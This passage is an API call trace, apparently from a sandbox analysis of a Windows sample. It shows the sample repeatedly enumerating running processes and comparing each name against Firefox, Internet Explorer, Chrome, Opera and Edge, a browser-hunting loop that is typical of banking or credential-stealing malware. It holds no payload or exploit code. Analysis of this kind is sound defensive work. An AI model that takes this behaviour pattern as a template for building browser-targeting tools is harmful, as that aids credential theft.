lpString2="firefox.exe") returned 1 [0174.794] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0174.794] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0174.794] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0174.794] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.794] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0174.795] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0174.795] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0174.795] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0174.795] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0174.795] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.795] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0174.795] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0174.795] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0174.795] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0174.795] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0174.795] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.795] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0174.796] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0174.796] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0174.796] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0174.796] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0174.796] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.796] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0174.796] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0174.796] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0174.796] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0174.797] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0174.797] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.797] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0174.797] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0174.797] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0174.797] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0174.797] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0174.797] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.797] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0174.798] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0174.798] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0174.798] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0174.798] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0174.798] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.798] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0174.798] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0174.798] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0174.798] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0174.798] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0174.798] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.798] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0174.799] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0174.799] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0174.799] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0174.799] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0174.799] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.799] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0174.799] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0174.799] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0174.799] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0174.800] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0174.800] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.800] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0174.800] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0174.800] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0174.800] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0174.800] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0174.800] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.800] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0174.801] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0174.801] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0174.801] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0174.801] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0174.801] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.801] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0174.801] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0174.801] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0174.801] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0174.801] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0174.801] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.801] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0174.802] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0174.802] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0174.802] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0174.802] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0174.802] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.802] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0174.802] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0174.802] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0174.802] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0174.803] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0174.803] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.803] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0174.803] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0174.803] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0174.803] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0174.803] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0174.803] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.803] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0174.804] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0174.804] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0174.804] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0174.804] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0174.804] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.804] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0174.804] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0174.804] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0174.804] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0174.804] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0174.804] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.804] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0174.805] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0174.805] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0174.805] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0174.805] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0174.805] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.805] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0174.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0174.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0174.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0174.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.806] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.806] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.806] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.806] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.806] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.806] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.806] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0174.807] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0174.807] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0174.807] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0174.807] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0174.807] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.807] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.807] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.807] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.807] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.807] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.807] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.807] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0174.808] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0174.808] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0174.808] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0174.808] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0174.808] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.808] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.809] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.809] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.809] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.809] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.809] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.809] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.809] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.809] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.809] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.809] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0174.809] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.809] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0174.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0174.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0174.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0174.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0174.810] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.810] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.810] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0174.810] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0174.810] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0174.810] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0174.810] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.810] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.811] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.811] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.811] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.811] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0174.811] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.811] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.811] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.812] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0174.812] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.812] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.813] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.813] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.813] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.813] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0174.813] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.813] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0174.813] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0174.813] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0174.813] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0174.813] lstrcmpiA (lpString1="regsvr32.exe", lpString2="opera.exe") returned 1 [0174.813] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.813] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0174.814] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0174.814] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0174.814] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0174.814] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0174.814] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0174.814] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0174.815] CloseHandle (hObject=0xe8) returned 1 [0174.815] Sleep (dwMilliseconds=0x3e8) [0175.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0175.858] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.858] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0175.859] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0175.859] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0175.859] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0175.859] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0175.859] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0175.859] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0175.859] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0175.859] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0175.859] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0175.859] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0175.859] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0175.860] 